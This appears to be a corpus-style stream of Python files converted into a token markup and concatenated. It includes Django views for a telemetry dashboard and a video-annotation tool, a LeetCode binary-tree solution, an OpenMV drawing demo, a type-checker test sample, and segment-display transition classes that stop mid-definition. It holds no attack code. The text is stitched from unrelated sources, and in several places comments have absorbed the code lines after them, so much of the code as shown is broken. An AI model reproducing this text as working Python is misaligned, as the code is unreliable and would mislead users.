sub_path))<block_end><else_stmt><block_start>file_list.append(sub_path)<block_end><block_end>text='<br>'.join(file_list)<line_sep><return>http.HttpResponse(text)<block_end><def_stmt>_GetMinMessageFrequency <block_start>"""Get the minimum frequency across all message types."""<line_sep>config=network_config.NetworkConfig(settings.NETWORK_YAML)<line_sep><return>min(m.frequency_hz<for>m config.all_messages<if>m.frequency_hz<g>0)<block_end><def_stmt>_TryToEnforceAioReceiver client_id<block_start>"""Ensure that the client is subscribed to the AioReceiver."""<line_sep># TODO: Investigate always running the AioReceiver. message_receiver=receiver_manager.ReceiverManager.GetReceiver(client_id)<if_stmt><not>message_receiver<block_start><if_stmt>receiver_manager.ReceiverManager.CheckAndStartAioReceiver(client_id receiver_views.CreateAioReceiver)# A new AioReceiver is started. # Get the longest period for all messages, and multiply it by two to # make sure we do not miss any message. <block_start>time.sleep(2.0/_GetMinMessageFrequency())<block_end><return>receiver_manager.ReceiverManager.GetReceiver(client_id)<block_end><else_stmt><block_start><return>message_receiver<block_end><block_end><def_stmt>ViewMessageType request client_id message_type template_name='monitor.html'<block_start>"""View information within a message by automatically generating a layout. Args: request: An HttpRequest from the client. client_id: The ID of the client's browser tab. message_type: The Enum name of a message type. template_name: The HTML template used to render the layout. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>configs=_LoadConfigs()<line_sep>_TryToEnforceAioReceiver(client_id)<line_sep>resp=_GetMessage(request client_id message_type)<line_sep>resp=resp.Data(convert_to_basic_types=<true>)<if>resp<else>{}<line_sep>configs['scenarios']=autogen.GenerateScenario(resp message_type)<line_sep>context=_PrepareContext(configs)<line_sep>new_client_id=_CreateAndAddClientIdToContext(context)<line_sep>context['periodic_url']='/dashboard/periodic/msg_enum/%s/%s'%(new_client_id message_type)<line_sep>context['content_width']=settings.CSS_GRID_COLUMNS<line_sep>context['order_horizontally']=<true><line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end><def_stmt>UpdateMessageOptions unused_request client_id<block_start>"""Detect what messages have been received and update the client. Args: unused_request: An HttpRequest from the client. client_id: The ID of the client's browser tab. Returns: An HttpResponse about a dictionary of {message_enum: message_short_name} """<line_sep>message_receiver=_TryToEnforceAioReceiver(client_id)<line_sep>info=message_receiver.GetReceivedMessageTypes()<if>message_receiver<else>[]<line_sep><return>http.HttpResponse(json.dumps(info))<block_end><def_stmt>ViewAioLayout request layout_name<block_start>"""Open a monitor layout that get data from AIO. Args: request: An HttpRequest from the client. layout_name: Name of the layout associated with the client. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>context={'receiver_type':'aio'}<line_sep><return>_ViewLayout(request layout_name context)<block_end><def_stmt>BrowseLog request path<block_start>"""Browse the log by expanding the field at `path`. Args: request: An HttpRequest from the client. path: A path pointing to one field in the log. Returns: An HttpResponse serializing a list of names for child fields. """<line_sep># The log structure may differ across logs, we always use the first log to # construct the log structure. log_path=request.session['log_paths'][0]<line_sep>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<try_stmt><block_start>skeleton=log_data.Skeleton(path depth=1)<block_end><except_stmt>h5_io.H5IndexError<block_start><return>http.HttpResponse('{}')<block_end>parent_path=path<line_sep>d3_data=struct_tree.DictToD3Tree(skeleton '.' parent_path)<if_stmt>'children'<in>d3_data# The first layer is a placeholder. Starts from the second layer. <block_start><return>http.HttpResponse(json.dumps(d3_data['children']))<block_end><else_stmt><block_start><return>http.HttpResponse('{}')<block_end><block_end><def_stmt>ViewLogStructure request paths template_name='log_structure.html'<block_start>"""View structure of an HDF5 log at given log path. Args: request: An HttpRequest from the client. paths: Paths to the local log files. template_name: The HTML template used to render the layout. Returns: An HttpResponse that renders the log structure. """<line_sep># `context` includes variables used to render the HTML. context={'graph_width':6000 'graph_height':6000 'frame_width':200 'frame_height':540 'canvas_cols':12 }<line_sep>log_paths=[]<for_stmt>path paths.split(';')<block_start>path=path.strip()<if_stmt><not>path<block_start><continue><block_end>path_template=string.Template(path)<line_sep>log_path=path_template.substitute(os.environ)<line_sep>basename=os.path.basename(log_path)<if_stmt>basename.startswith('(')<and>basename.endswith(')')<block_start>dirname=os.path.dirname(log_path)<line_sep>regex_pattern=re.compile(basename[1:-1]+'$')<line_sep>filenames=os.listdir(dirname)<line_sep>matched_files=[f<for>f filenames<if>regex_pattern.match(f)]<line_sep>log_paths<augadd>[os.path.join(dirname f)<for>f matched_files]<block_end><else_stmt><block_start>log_paths.append(log_path)<block_end><block_end><if_stmt><not>log_paths<block_start>context['errors']='Cannot find log data'<block_end><else_stmt># Use the first log to index fields. <block_start>log_data=struct_tree.StructTree(log_paths[0] fail_silently=<true> readonly=<true>)<line_sep>log_skeleton=log_data.Skeleton(depth=1)<line_sep>d3_data=struct_tree.DictToD3Tree(log_skeleton '/')<line_sep>d3_data['expand_url']=urlresolvers.reverse('browse_log' args=[''])<line_sep>request.session['log_paths']=log_paths<line_sep>context['skeleton']=json.dumps(d3_data)<block_end>order_horizontally=<true><line_sep>configs=_LoadConfigs()<line_sep>scenarios=layout_base.AssembleLayout([('Signals' [widgets.DictLinesWidget('series' <none> interactive=<true> use_markers=<true>) ]) ] desired_view_cols=1 order_horizontally=order_horizontally)<line_sep>layout_names=loader.LayoutLoader().ModuleNames()<line_sep>layout_names.sort()<line_sep>configs['scenarios']=scenarios<line_sep>context.update(_PrepareContext(configs))<line_sep>context['layout_names']=layout_names<line_sep>context['content_width']=settings.CSS_GRID_COLUMNS-2<line_sep>context['order_horizontally']=order_horizontally<line_sep>_CreateAndAddClientIdToContext(context)<line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end><def_stmt>PeriodicDataPoll request client_id layout_name<block_start>"""Compute realtime data and respond to periodic polling from a client layout. Args: request: An HttpRequest from the client. client_id: The ID of the client's browser tab. layout_name: Name of the layout associated with the client. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>aggregated_message=_GetMessage(request client_id)<if_stmt><not>aggregated_message<block_start>aggregated_message=struct_tree.StructTree({} fail_silently=<true> readonly=<true>)<block_end>layout=loader.LayoutLoader().GetLayoutByModuleName(layout_name)<line_sep>tab_memory=layout_memory.GetMemory(client_id <false>)<if_stmt>tab_memory<is><not><none># Load the persistent memory. <block_start>layout.Import(tab_memory)<block_end><else_stmt><block_start>layout.Initialize()<line_sep>tab_memory=layout_memory.GetMemory(client_id <true>)<block_end># Start the AIO receiver in case the server has restarted. _TryToEnforceAioReceiver(client_id)<try_stmt><block_start>data=layout.Filter(aggregated_message)<block_end><except_stmt>Exception# pylint: disable=broad-except # layout.Filter may introduce any kind of exception. <block_start>logging.error('PeriodicDataPoll encountered an error:\n%s' debug_util.FormatTraceback())<line_sep>layout.Export(tab_memory)<line_sep><return>http.HttpResponse('{}')<block_end># Save the persistent memory. layout.Export(tab_memory)<line_sep>resp=data.Json()<if_stmt>settings.DEBUG<block_start>resp['__message__']='\n-----------------------------\n'.join('Error in indicator "%s":\n%s'%(k v)<for>k,v layout.ErrorReport())<block_end>resp_str=json.dumps(resp)<line_sep>layout.ClearErrors()<line_sep><return>http.HttpResponse(resp_str)<block_end><def_stmt>_DownSample data length<block_start>window_size=max(1 len(data)/length)<if_stmt>window_size<g>1<block_start>data=data[:len(data)/window_size<times>window_size]<line_sep><return>numpy.mean(data.reshape(-1 window_size) 1) window_size<block_end><else_stmt><block_start><return>data 1<block_end><block_end><def_stmt>GetLogData request mode fields<block_start>"""Get values of data fields within a log file."""<line_sep>log_paths=request.session['log_paths']<line_sep>fields=[f.strip()<for>f fields.split('\n')<if>f.strip()]<line_sep>field_labels=layout_util.GetDistinguishableNames(fields '.' ['kAioNode' 'kMessageType'])<if_stmt>mode<eq>'merge'<block_start>series=ConcatenateLogData(log_paths field_labels)<block_end><else_stmt># By default, mode = 'compare' <block_start>series=CompareLogData(log_paths field_labels)<block_end>resp={'series':series}<line_sep><return>http.HttpResponse(json.dumps(resp))<block_end><def_stmt>_StringReplace subject translate<block_start><for_stmt>s,t translate<block_start>subject=subject.replace(s t)<block_end><return>subject<block_end><def_stmt>GetMessageSnapshot request client_id title<block_start>aggregated_message=_GetMessage(request client_id)<line_sep>result=aggregated_message.Data(<true>)<line_sep>response=http.HttpResponse(content_type='text/plain')<line_sep>response['Content-Disposition']=('attachment; filename=snapshot_%s.json'%title)<line_sep>response.write(json.dumps(result indent=2))<line_sep><return>response<block_end><def_stmt>GetRawLogData request fields<block_start>"""Get values of data fields within a log file."""<line_sep>log_paths=request.session['log_paths']<line_sep>fields=[f.strip()<for>f fields.split('\n')<if>f.strip()]<line_sep>field_labels=layout_util.GetDistinguishableNames(fields '.' ['kAioNode' 'kMessageType'])<line_sep>result={}<line_sep># Remove special characters so variables can be parsed and loaded into Matlab. bad_chars=['.' ',' '-' '+' '(' ')' '[' ']' '{' '}' ':' 'kMessageType' 'kAioNode' 'messages' 'message']<line_sep>replacement=list(zip(bad_chars ['_']<times>len(bad_chars)))<line_sep>replacement=[('[:]' '') (':,' '') (' ' '')]+replacement<for_stmt>log_path log_paths<block_start>base_name=os.path.basename(log_path)<line_sep>log_name='log_'+_StringReplace(base_name[:base_name.find('.')] replacement)<line_sep>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<line_sep>result[log_name]={}<for_stmt>field,legend_label field_labels.iteritems()<block_start>data,timestamps=log_util.GetOrderedDedupDataAndTimeByField(log_data field rebase=<false>)<line_sep>result[log_name][_StringReplace(legend_label replacement)]={'values':data.tolist()<if>data<is><not><none><else><none> 'timestamps':timestamps.tolist()<if>timestamps<is><not><none><else><none> 'status':'success'<if>data<is><not><none><else>'missing' }<block_end><block_end>response=http.HttpResponse(content_type='text/plain')<line_sep>response['Content-Disposition']='attachment; filename=makani_log_data.json'<line_sep>response.write(json.dumps(result indent=2))<line_sep><return>response<block_end><def_stmt>ConcatenateLogData log_paths field_labels<block_start>"""Get series of data, each corresponding to field values in all logs."""<line_sep>series={}<line_sep>base_timeline=float('inf')<for_stmt>log_path log_paths<block_start>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<for_stmt>field,legend_label field_labels.iteritems()<block_start>data,timestamps=log_util.GetOrderedDedupDataAndTimeByField(log_data field rebase=<false>)<if_stmt>data<is><none><or>timestamps<is><none><block_start><continue><block_end>base_timeline=min(base_timeline float(timestamps[0]))<if_stmt>legend_label<not><in>series<block_start>series[legend_label]={'x':timestamps 'y':data}<block_end><else_stmt><block_start>series[legend_label]['x']=numpy.concatenate((series[legend_label]['x'] timestamps))<line_sep>series[legend_label]['y']=numpy.concatenate((series[legend_label]['y'] data))<block_end><block_end><block_end>result={}<for_stmt>field,legend_label field_labels.iteritems()<block_start>timestamps,_=_DownSample(series[legend_label]['x'] settings.MAX_DATA_POINTS_PER_LOG_FIELD)<line_sep>data,downsample_rate=_DownSample(series[legend_label]['y'] settings.MAX_DATA_POINTS_PER_LOG_FIELD)<if_stmt>downsample_rate<g>1<block_start>legend_label<augadd>'(/%d)'%downsample_rate<block_end>result[legend_label]={'x':(timestamps-base_timeline).tolist() 'y':data.tolist()}<block_end><return>result<block_end><def_stmt>CompareLogData log_paths field_labels<block_start>"""Get series of data, each corresponding to field values within a log."""<line_sep>series={}<line_sep>base_timeline=float('inf')<for_stmt>log_path log_paths<block_start>log_data=struct_tree.StructTree(log_path fail_silently=<true> readonly=<true>)<line_sep>log_name=os.path.basename(log_path)<if_stmt>'.'<in>log_name<block_start>log_name=log_name[:log_name.rfind('.')]<block_end><for_stmt>field,legend_label field_labels.iteritems()<block_start>data,timestamps=log_util.GetOrderedDedupDataAndTimeByField(log_data field rebase=<true>)<if_stmt>data<is><none><or>timestamps<is><none><block_start><continue><block_end>data,_=_DownSample(data settings.MAX_DATA_POINTS_PER_LOG_FIELD)<line_sep>timestamps,downsample_rate=_DownSample(timestamps settings.MAX_DATA_POINTS_PER_LOG_FIELD)<line_sep>base_timeline=min(base_timeline float(timestamps[0]))<line_sep>short_name='%s.%s'%(log_name legend_label)<if_stmt>downsample_rate<g>1<block_start>short_name<augadd>'(/%d)'%downsample_rate<block_end>series[short_name]={'x':timestamps 'y':data.tolist()}<block_end><block_end><for_stmt>short_name series<block_start>series[short_name]['x']=(series[short_name]['x']-base_timeline).tolist()<block_end><return>series<block_end><def_stmt>PeriodicMessagePoll request client_id message_type=<none><block_start>"""Retrieve realtime data and respond to periodic polling from a message view. Args: request: An HttpRequest from the client. client_id: The ID of the client's browser tab. message_type: The Enum name of a message type. Returns: An HttpResponse in the format of a serialized JSON object. """<line_sep>resp=_GetMessage(request client_id message_type)<if_stmt><not>resp<block_start>resp={}<block_end><else_stmt><block_start>resp=resp.Data(convert_to_basic_types=<true>)<block_end>resp_str=json.dumps(resp)<line_sep><return>http.HttpResponse(resp_str)<block_end><def_stmt>_LoadConfigs <block_start>"""Load default layout configuration parameters."""<line_sep>configs={}<for_stmt>cf,filename CONFIG_FILES.iteritems()<block_start><with_stmt>open(filename 'r')<as>fp<block_start>configs[cf]=json.load(fp)<block_end><block_end><if_stmt>'plot_defs'<not><in>configs<block_start>logging.Error('Missing definitions for plotting javascripts.')<block_end><return>configs<block_end><def_stmt>_PrepareContext configs<block_start>"""Prepare the context to render the layout."""<line_sep>context={}<line_sep>fig_templates=set()<line_sep>canvas_cols=configs['scenarios']['canvas']['grid_width']<line_sep>context['canvas_cols']=canvas_cols<line_sep>row_height_px=configs['scenarios']['canvas']['row_height_px']<line_sep>ui_objs=[]<line_sep>max_cols=canvas_cols<for_stmt>stripe configs['scenarios']['views']<block_start><for_stmt>view stripe['stripe']<block_start>view['canvas_cols']=int(float(view['grid_width'])/stripe['grid_width']<times>canvas_cols+0.5)<for_stmt>indicator view['indicators']<block_start>ui_obj=indicator<if_stmt>'rows'<not><in>ui_obj<block_start>ui_obj['height']='auto'<block_end><else_stmt><block_start>rows=ui_obj['rows']<line_sep>ui_obj['height']=str(rows<times>row_height_px)+'px'<block_end><if_stmt>'cols'<not><in>ui_obj<block_start>ui_obj['cols']=max_cols<block_end># TODO: Change `id` to 'indicator_id', and 'selector' # to 'dom_selector'. ui_obj['id']='ui_obj_%s'%len(ui_objs)<line_sep>ui_obj['selector']='#%s'%(ui_obj['id'])<line_sep>ui_objs.append(ui_obj)<line_sep>fig_templates.add(ui_obj['template'])<block_end><block_end><block_end>context['fig_templates']=fig_templates<line_sep>context['plot_defs']=configs['plot_defs']<line_sep>context['views']=configs['scenarios']['views']<line_sep>context['ui_objs_str']=json.dumps(ui_objs)<line_sep>context['stoplight_error']=stoplights.STOPLIGHT_ERROR<line_sep>context['stoplight_warning']=stoplights.STOPLIGHT_WARNING<line_sep>context['stoplight_normal']=stoplights.STOPLIGHT_NORMAL<line_sep>context['stoplight_unavailable']=stoplights.STOPLIGHT_UNAVAILABLE<line_sep>context['stoplight_any']=stoplights.STOPLIGHT_ANY<line_sep><return>context<block_end><def_stmt>_GetMessage unused_request client_id message_type=<none><block_start>"""Get a message from the receiver."""<line_sep>message_receiver=receiver_manager.ReceiverManager.GetReceiver(client_id)<line_sep>resp=struct_tree.StructTree({} fail_silently=<true> readonly=<true>)<if_stmt>message_receiver<block_start><if_stmt>message_type<is><not><none><block_start>message_enum=MESSAGE_TYPE_HELPER.Value(message_type)<block_end><else_stmt><block_start>message_enum=<none><block_end>resp=message_receiver.GetLatest(message_enum)<block_end><return>resp<block_end><def_stmt>_CreateAndAddClientIdToContext context<block_start>client_id=receiver_manager.ReceiverManager.GetNewClientId()<line_sep>context['client_id']=client_id<line_sep><return>client_id<block_end><def_stmt>_ViewLayout request layout_name extra_context=<none><block_start>"""Get a monitor layout according to `layout_name`."""<line_sep>layout=loader.LayoutLoader().GetLayoutByModuleName(layout_name)<if_stmt>layout<is><none><block_start><return>http.HttpResponseRedirect(urlresolvers.reverse('home'))<block_end>layout.Initialize()<line_sep>configs=_LoadConfigs()<line_sep>configs['scenarios']=layout.Scenario()<line_sep>context=_PrepareContext(configs)<line_sep>client_id=_CreateAndAddClientIdToContext(context)<line_sep># Initialize the layout. layout.Export(layout_memory.GetMemory(client_id <true>))<line_sep># Add polling URL. context['periodic_url']='/dashboard/periodic/layout/%s/%s'%(client_id layout_name)<line_sep>context['layout_name']=layout_name<line_sep>context['content_width']=settings.CSS_GRID_COLUMNS<line_sep>context['order_horizontally']=layout.OrderHorizontally()<line_sep>context['default_font_size']=layout.DefaultFontSize()<line_sep>context['sim_mode']=settings.POPULATE_MESSAGES_FROM_SIM<if_stmt>extra_context<block_start>context.update(extra_context)<block_end>template_name='monitor.html'<line_sep><return>shortcuts.render(request template_name context context_instance=template.RequestContext(request))<block_end>
""" Given the root of a binary search tree, rearrange the tree in in-order so that the leftmost node in the tree is now the root of the tree, and every node has no left child and only one right child.   Example 1: Input: root = [5,3,6,2,4,null,8,1,null,null,null,7,9] Output: [1,null,2,null,3,null,4,null,5,null,6,null,7,null,8,null,9] Example 2: Input: root = [5,1,7] Output: [1,null,5,null,7]   Constraints: The number of nodes in the given tree will be in the range [1, 100]. 0 <= Node.val <= 1000 """<line_sep># Definition for a binary tree node. # class TreeNode: # def __init__(self, val=0, left=None, right=None): # self.val = val # self.left = left # self.right = right <class_stmt>Solution<block_start><def_stmt>increasingBST self root:TreeNode<arrow>TreeNode<block_start><def_stmt>inorder root arr<block_start><if_stmt>root<is><none><block_start><return><block_end>inorder(root.left arr)<line_sep>arr.append(root.val)<line_sep>inorder(root.right arr)<block_end>arr=[]<line_sep>inorder(root arr)<line_sep>ps=[]<for_stmt>i,val enumerate(arr)<block_start>c=TreeNode(val)<if_stmt>i<g>0<block_start>ps[-1].right=c<block_end>ps.append(c)<block_end><return>ps[0]<block_end><block_end>
<import_from_stmt>django.shortcuts render redirect<import_from_stmt>django.conf settings<import_from_stmt>django.http HttpResponse Http404 HttpResponseBadRequest HttpResponseForbidden<import_from_stmt>django.views.generic View<import_from_stmt>django.views.decorators.clickjacking xframe_options_exempt<import_from_stmt>django.contrib.admin.views.decorators staff_member_required<import_from_stmt>django.core.exceptions ObjectDoesNotExist<import_from_stmt>mturk.queries get_active_video_turk_task<import_from_stmt>.models *<import_from_stmt>mturk.models Task FullVideoTask SingleFrameTask<import_from_stmt>.services *<import_from_stmt>datetime datetime timezone<import_stmt>os<import_stmt>json<import_stmt>urllib.request<import_stmt>urllib.parse<import_stmt>markdown<import_stmt>sys<import_stmt>mturk.utils<import_from_stmt>mturk.queries get_active_video_turk_task<import_from_stmt>.models *<import_from_stmt>.services *<import_stmt>logging<import_stmt>ast<line_sep>logger=logging.getLogger()<def_stmt>home request<block_start>need_annotating=Video.objects.filter(id__gt=0 verified=<false>)<line_sep><return>render(request 'video_list.html' context={'videos':need_annotating 'thumbnail':<true> 'test':settings.AWS_ID 'title':'Videos'})<block_end><def_stmt>verify_list request<block_start>need_verification=Video.objects.filter(id__gt=0 verified=<false>).exclude(annotation='')[:250]<line_sep><return>render(request 'video_list.html' context={'videos':need_verification 'title':'Videos to Verify'})<block_end><def_stmt>verified_list request<block_start>verified=Video.objects.filter(id__gt=0 verified=<true>).exclude(annotation='')[:100]<line_sep><return>render(request 'video_list.html' context={'videos':verified 'title':'Verified Videos'})<block_end><def_stmt>ready_to_pay request#tasks = FullVideoTask.objects.filter(paid = False, video__verified = True).exclude(hit_id = '') <block_start>tasks=FullVideoTask.objects.all()#filter(paid = False, video__verified = True).exclude(hit_id = '') print("there are {} tasks".format(len(tasks)))<line_sep><return>render(request 'turk_ready_to_pay.html' context={'tasks':tasks })<block_end><def_stmt>next_unannotated request video_id<block_start>id=Video.objects.filter(id__gt=video_id annotation='')[0].id<line_sep><return>redirect('video' id)<block_end># status of Not Published, Published, Awaiting Approval, Verified # this is a bit convoluted as there's status stored on # video (approved) as well as FullVideoTask (closed, paid, etc.) <def_stmt>get_mturk_status video full_video_task<block_start><if_stmt>video.verified<block_start><return>"Verified"<block_end><if_stmt>full_video_task<eq><none><block_start><if_stmt>video.rejected<eq><true><block_start><return>"Rejected"<block_end><elif_stmt>video.annotation<eq>''<block_start><return>"Not Published"<block_end><else_stmt><block_start><return>"Awaiting Approval"<block_end><block_end><if_stmt>full_video_task.worker_id<eq>''<block_start><return>"Published"<block_end><if_stmt>full_video_task.worker_id<ne>''<block_start><return>"Awaiting Approval"<block_end><block_end>@xframe_options_exempt<def_stmt>video request video_id<block_start><try_stmt><block_start>video=Video.objects.get(id=video_id)<line_sep>labels=Label.objects.all()<block_end><except_stmt>Video.DoesNotExist<block_start><raise>Http404('No video with id "{}". Possible fixes: \n1) Download an up to date DB, see README. \n2) Add this video to the DB via /admin'.format(video_id))<block_end>mturk_data=mturk.utils.authenticate_hit(request)<if_stmt>'error'<in>mturk_data<block_start><return>HttpResponseForbidden(mturk_data['error'])<block_end><if_stmt><not>(mturk_data['authenticated']<or>request.user.is_authenticated())<block_start><return>redirect('/login/?next='+request.path)<block_end>start_time=float(request.GET['s'])<if>'s'<in>request.GET<else><none><line_sep>end_time=float(request.GET['e'])<if>'e'<in>request.GET<else><none><line_sep>turk_task=get_active_video_turk_task(video.id)<if_stmt>turk_task<ne><none><block_start><if_stmt>turk_task.metrics<ne>''<block_start>metricsDictr=ast.literal_eval(turk_task.metrics)<block_end><else_stmt><block_start>metricsDictr={}<block_end># Data for Javascript full_video_task_data={'id':turk_task.id 'storedMetrics':metricsDictr 'bonus':float(turk_task.bonus) 'bonusMessage':turk_task.message 'rejectionMessage':settings.MTURK_REJECTION_MESSAGE 'emailSubject':settings.MTURK_EMAIL_SUBJECT 'emailMessage':settings.MTURK_EMAIL_MESSAGE 'isComplete':turk_task.worker_id<ne>''}<line_sep># Data for python templating <if_stmt>turk_task.last_email_sent_date<ne><none><block_start>mturk_data['last_email_sent_date']=turk_task.last_email_sent_date.strftime("%Y-%m-%d %H:%M")<block_end><block_end><else_stmt><block_start>full_video_task_data=<none><block_end>mturk_data['status']=get_mturk_status(video turk_task)<line_sep>mturk_data['has_current_full_video_task']=full_video_task_data<ne><none><line_sep>video_data=json.dumps({'id':video.id 'location':video.url 'path':video.host 'is_image_sequence':<true><if>video.image_list<else><false> 'annotated':video.annotation<ne>'' 'verified':video.verified 'rejected':video.rejected 'start_time':start_time 'end_time':end_time 'turk_task':full_video_task_data})<line_sep>label_data=[]<line_sep>video_labels=video.labels.all()<if_stmt>len(video_labels)<block_start><for_stmt>v_label video_labels<block_start>label_data.append({'name':v_label.name 'color':v_label.color})<block_end><block_end><else_stmt><block_start><for_stmt>l labels<block_start>label_data.append({'name':l.name 'color':l.color})<block_end><block_end>help_content=''<if_stmt>settings.HELP_URL<and>settings.HELP_USE_MARKDOWN<block_start>help_content=urllib.request.urlopen(settings.HELP_URL).read().decode('utf-8')<line_sep>help_content=markdown.markdown(help_content)<block_end>response=render(request 'video.html' context={'label_data':label_data 'video_data':video_data 'image_list':list(map(urllib.parse.quote json.loads(video.image_list)))<if>video.image_list<else>0 'image_list_path':urllib.parse.quote(video.host safe='/:') 'help_url':settings.HELP_URL 'help_embed':settings.HELP_EMBED 'mturk_data':mturk_data 'iframe_mode':mturk_data['authenticated'] 'survey':<false> 'help_content':help_content})<if_stmt><not>mturk_data['authenticated']<block_start>response['X-Frame-Options']='SAMEORIGIN'<block_end><return>response<block_end><def_stmt>get_states request states=<none><block_start>label_name=request.GET.get('label_name')<if_stmt>label_name<block_start>label_name=label_name.replace("%20" " ")<block_end># iterate over each city and append to results list state_data=[{'name':s.name 'color':s.color}<for>s State.objects.filter(label_name=label_name)]<line_sep># return JSON object <return>HttpResponse(json.dumps(state_data))<block_end><class_stmt>AnnotationView(View)<block_start><def_stmt>get self request video_id<block_start>video=Video.objects.get(id=video_id)<line_sep><return>HttpResponse(video.annotation content_type='application/json')<block_end><def_stmt>post self request video_id<block_start>data=json.loads(request.body.decode('utf-8'))<line_sep>video=Video.objects.get(id=video_id)<line_sep>video.annotation=json.dumps(data['annotation'])<line_sep>video.save()<line_sep>hit_id=data.get('hitId' <none>)<if_stmt>hit_id<ne><none><block_start><if_stmt><not>Task.valid_hit_id(hit_id)<block_start><return>HttpResponseForbidden('Not authenticated')<block_end><else_stmt><block_start><try_stmt><block_start>worker_id=data.get('workerId' '')<line_sep>assignment_id=data.get('assignmentId' '')<line_sep>task=Task.get_by_hit_id(hit_id)<line_sep>task.complete(worker_id assignment_id data['metrics'])<block_end><except_stmt>ObjectDoesNotExist<block_start><if_stmt><not>settings.DEBUG<block_start><raise><block_end><block_end><block_end><block_end><return>HttpResponse('success')<block_end><block_end><class_stmt>ReceiveCommand(View)<block_start><def_stmt>post self request video_id<block_start>data=json.loads(request.body.decode('utf-8'))<try_stmt><block_start>vid_id=int(video_id)<line_sep>command_type=data['type']<line_sep>message=data['message']<if_stmt>command_type<eq>"accept"<block_start>accept_video(request vid_id data['bonus'] message data['reopen'] data['delete_boxes'] data['block_worker'] data['updated_annotations'])<block_end><elif_stmt>command_type<eq>"reject"<block_start>reject_video(request vid_id message data['reopen'] data['delete_boxes'] data['block_worker'] data['updated_annotations'])<block_end><elif_stmt>command_type<eq>"email"<block_start>email_worker(request vid_id data['subject'] message)<block_end><return>HttpResponse(status=200)<block_end><except_stmt>Exception<as>e<block_start>logger.exception(e)<line_sep>response=HttpResponse(status=500)<line_sep>response['error-message']=str(e)<line_sep><return>response<block_end><block_end><block_end>
<import_from_stmt>django.contrib admin<import_from_stmt>basic.messages.models Message<class_stmt>MessageAdmin(admin.ModelAdmin)<block_start>list_display=('from_user' 'to_user' 'subject' 'to_status' 'from_status' 'created' 'content_type' 'object_id')<block_end>admin.site.register(Message MessageAdmin)<line_sep>
# Line Drawing # # This example shows off drawing lines on the OpenMV Cam. <import_stmt>sensor image time pyb<line_sep>sensor.reset()<line_sep>sensor.set_pixformat(sensor.GRAYSCALE)# or GRAYSCALE... sensor.set_framesize(sensor.QVGA)# or QQVGA... sensor.skip_frames(time=2000)<line_sep>clock=time.clock()<while_stmt>(<true>)<block_start>clock.tick()<line_sep>img=sensor.snapshot()<for_stmt>i range(10)<block_start>x0=(pyb.rng()%(2<times>img.width()))-(img.width()<floordiv>2)<line_sep>y0=(pyb.rng()%(2<times>img.height()))-(img.height()<floordiv>2)<line_sep>x1=(pyb.rng()%(2<times>img.width()))-(img.width()<floordiv>2)<line_sep>y1=(pyb.rng()%(2<times>img.height()))-(img.height()<floordiv>2)<line_sep>r=(pyb.rng()%127)+128<line_sep>g=(pyb.rng()%127)+128<line_sep>b=(pyb.rng()%127)+128<line_sep># If the first argument is a scaler then this method expects # to see x0, y0, x1, and y1. Otherwise, it expects a (x0,y0,x1,y1) tuple. img.draw_line(x0 y0 x1 y1 color=(r g b) thickness=2)<block_end>print(clock.fps())<block_end>
# This sample tests annotated types on global variables. # This should generate an error because the declared # type below does not match the assigned type. glob_var1=4<line_sep># This should generate an error because the declared # type doesn't match the later declared type. glob_var1=Exception()# type: str glob_var1=Exception()# type: Exception # This should generate an error because the assigned # type doesn't match the declared type. glob_var1="hello"# type: Exception # This should generate an error. glob_var2=5<def_stmt>func1 <block_start><global>glob_var1<line_sep><global>glob_var2<line_sep># This should generate an error. glob_var1=3<line_sep>glob_var2="hello"<block_end># type: str
"""Text transitions used for segment displays."""<import_stmt>abc<import_from_stmt>typing Optional List<import_from_stmt>mpf.core.placeholder_manager TextTemplate<import_from_stmt>mpf.core.rgb_color RGBColor<import_from_stmt>mpf.devices.segment_display.segment_display_text SegmentDisplayText UncoloredSegmentDisplayText<line_sep>STEP_OUT_OF_RANGE_ERROR="Step is out of range"<line_sep>TRANSITION_DIRECTION_UNKNOWN_ERROR="Transition uses an unknown direction value"<class_stmt>TransitionBase(metaclass=abc.ABCMeta)<block_start>"""Base class for text transitions in segment displays."""<line_sep>__slots__=["output_length" "config" "collapse_dots" "collapse_commas"]<def_stmt>__init__ self output_length:int collapse_dots:bool collapse_commas:bool config:dict<arrow><none><block_start>"""Initialize the transition."""<line_sep>self.output_length=output_length<line_sep>self.config=config<line_sep>self.collapse_dots=collapse_dots<line_sep>self.collapse_commas=collapse_commas<for_stmt>key,value config.items()<block_start><if_stmt>hasattr(self key)<block_start>setattr(self key value)<block_end><block_end><block_end>@abc.abstractmethod<def_stmt>get_step_count self<block_start>"""Return the total number of steps required for the transition."""<line_sep><raise>NotImplementedError<block_end># pylint: disable=too-many-arguments @abc.abstractmethod<def_stmt>get_transition_step self step:int current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow>SegmentDisplayText<block_start>"""Calculate all the steps in the transition."""<line_sep><raise>NotImplementedError<block_end><block_end><class_stmt>TransitionRunner<block_start>"""Class to run/execute transitions using an iterator."""<line_sep>__slots__=["_transition" "_step" "_current_placeholder" "_new_placeholder" "_current_colors" "_new_colors"]<line_sep># pylint: disable=too-many-arguments <def_stmt>__init__ self machine transition:TransitionBase current_text:str new_text:str current_colors:Optional[List[RGBColor]]=<none> new_colors:Optional[List[RGBColor]]=<none><arrow><none><block_start>"""Class initializer."""<line_sep>self._transition=transition<line_sep>self._step=0<line_sep>self._current_placeholder=TextTemplate(machine current_text)<line_sep>self._new_placeholder=TextTemplate(machine new_text)<line_sep>self._current_colors=current_colors<line_sep>self._new_colors=new_colors<block_end><def_stmt>__iter__ self<block_start>"""Return the iterator."""<line_sep><return>self<block_end><def_stmt>__next__ self<block_start>"""Evaluate and return the next transition step."""<if_stmt>self._step<ge>self._transition.get_step_count()<block_start><raise>StopIteration<block_end>transition_step=self._transition.get_transition_step(self._step self._current_placeholder.evaluate({}) self._new_placeholder.evaluate({}) self._current_colors self._new_colors)<line_sep>self._step<augadd>1<line_sep><return>transition_step<block_end><block_end><class_stmt>NoTransition(TransitionBase)<block_start>"""Segment display no transition effect."""<def_stmt>get_step_count 